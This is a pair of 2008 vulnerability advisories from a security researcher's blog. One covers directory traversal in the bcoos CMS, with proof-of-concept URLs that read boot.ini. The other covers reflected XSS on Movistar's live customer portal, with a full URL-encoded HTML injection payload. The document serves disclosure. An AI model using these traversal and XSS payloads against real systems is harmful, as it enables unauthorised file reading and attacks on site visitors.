Bcoos highlight.php traversal file access

Sunday, May 18, 2008
####################################
Bcoos =< 1.0.13 highlight.php traversal file access
Vendor URL: http://www.bcoos.net
Advisore:http://lostmon.blogspot.com/2008/05/
bcoos-highlightphp-traversal-file.html
Vendor notify:yes Exploit available:yes
####################################


bcoos is content-community management system written in PHP-MySQL

Directory traversal vulnerability in bcoos 1.0.13 and earlier
allows remote attackers to read arbitrary files via a ../
(dot dot) in the CD command or if the attacker know the full path.

Only Can read Files with extension, if the file don´t have extension
bcoos redirect to index.

##############
Versions
##############

bcoos 1.0.13
bcoos 1.0.12
bcoos 1.0.11
bcoos 1.0.10
bcoos 1.0.9

##############
Solution
##############

No solutions was available at this time !!!

Vendor Bugtrack : http://www.bcoos.net/modules/
devtracker/view_issue.php?issue_id=2467

##############
TimeLine
##############

Discovered:02-03-2008
vendor notify:18-05-2008
vendor response:
vendor fix:
Disclosure:18-05-2008

################
Proof of Concept
################

http://localhost/bcoos/class/debug/
highlight.php?file=C:\boot.ini

http://localhost/bcoos/class/debug/
highlight.php?file=../../../../../boot.ini

For exploit this issue the attacker need webmaster privileges.
But if a system has multiple webmasters.. all can read files
outside webserver root directory.

The file what we want to access need a extension if the file no
have extensionvwe can´t read it, and bcoos redirects to index.

################€nd##################

--
Thnx to estrella to be my ligth
Thnx To FalconDeOro for his support
Thnx To Imydes From http://www.imydes.com

--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....

Canal cliente de Movistar Vulnerable a XSS

Saturday, May 17, 2008
######################################
Canal cliente de Movistar Vulnerable a ataques Cross-Site Scripting
######################################

La pagina De movistar https://www.canalcliente.movistar.es
se haya afectada por una vulnerabilidad llamada Cross-site
scripting (XSS) atraves de la cual un atacante puede inducir
a un usuario victima a visitar dicha pagina, atraves de una URL
modificada especialmente y ejecutar codigo html o javascript en
el navegador del usuario victima , en el contexto de seguridad
en el margen de confianza entre el navegador y el servidor
pudiendo obtener la informacion acabada de enviar por el
usuario o establecer acciones por el.

Existe una prueba de concepto y una imagen de muestra.
Movistar fue avisado atraves de un correo y de su sistema de contacto
en la misma web pero no se ha obtenido respuesta.

#################
Exploit
#################
https://www.canalcliente.movistar.es/fwk/cda/controller/CCLI_CW_publico/0,2214,259_1854_200108516_0_0,00.html?codError=SGAP036&mensaje=%3C%68%31%3E%53%65%20%62%75%73%63%61%20%48%34%78%30%72%3C%73%74%72%6F%6E%67%3E%2C%20%63%6F%6D%6F%20%4C%6F%73%74%6D%6F%6E%20%70%6F%72%20%65%6A%65%6D%70%6C%6F%3A%3C%70%3E%0D%0A%3C%70%3E%3C%61%20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%4C%6F%73%74%6D%6F%6E%2E%62%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%68%74%74%70%3A%2F%2F%4C%6F%73%74%6D%6F%6E%2E%62%6C%6F%67%73%70%6F%74%2E%63%6F%6D%3C%2F%61%3E%3C%2F%70%3E%3C%2F%68%31%3E%0D%0A%20%45%73%20%70%65%6C%69%67%72%6F%73%6F%20%79%20%76%61%20%61%72%6D%61%64%6F%3C%62%72%3E%20%4C%6C%65%76%61%20%75%6E%20%70%6F%72%74%61%74%69%6C%20%79%20%75%6E%20%70%61%6C%6D%20%65%6E%20%6C%61%73%20%6D%61%6E%6F%73%3C%62%72%3E%20%73%69%20%6C%65%20%76%65%6E%20%3B%20%6E%6F%20%6C%65%20%70%72%6F%70%6F%72%63%69%6F%6E%65%6E%20%63%6F%6E%65%78%69%6F%6E%20%61%20%69%6E%74%65%72%6E%65%74%2E%3C%2F%70%3E%3C%2F%73%74%72%6F%6E%67%3E%3C%70%3E%3C%2F%70%3E%3C%69%6D%67%20%73%72%63%3D%68%74%74%70%3A%2F%2F%77%77%77%2E%74%74%76%6E%2E%63%6F%6D%2E%76%6E%2F%55%70%6C%6F%61%64%65%64%2F%61%64%6D%69%6E%69%73%74%72%61%74%6F%72%2F%68%61%63%6B%65%72%2E%6A%70%67%3E%3C%68%31%3E%42%79%20%4C%6F%73%74%6D%6F%6E%3C%2F%68%31%3E


--
Thnx to estrella to be my ligth
Thnx To FalconDeOro for his support
Thnx To Imydes From http://www.imydes.com

--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....

Latest OSVDB Vulnerabilities

 

Browse

About:Me

My blog:http://lostmon.blogspot.com
Mail:Lostmon@gmail.com
Lostmon Google group
Lostmon@googlegroups.com

La curiosidad es lo que hace
mover la mente...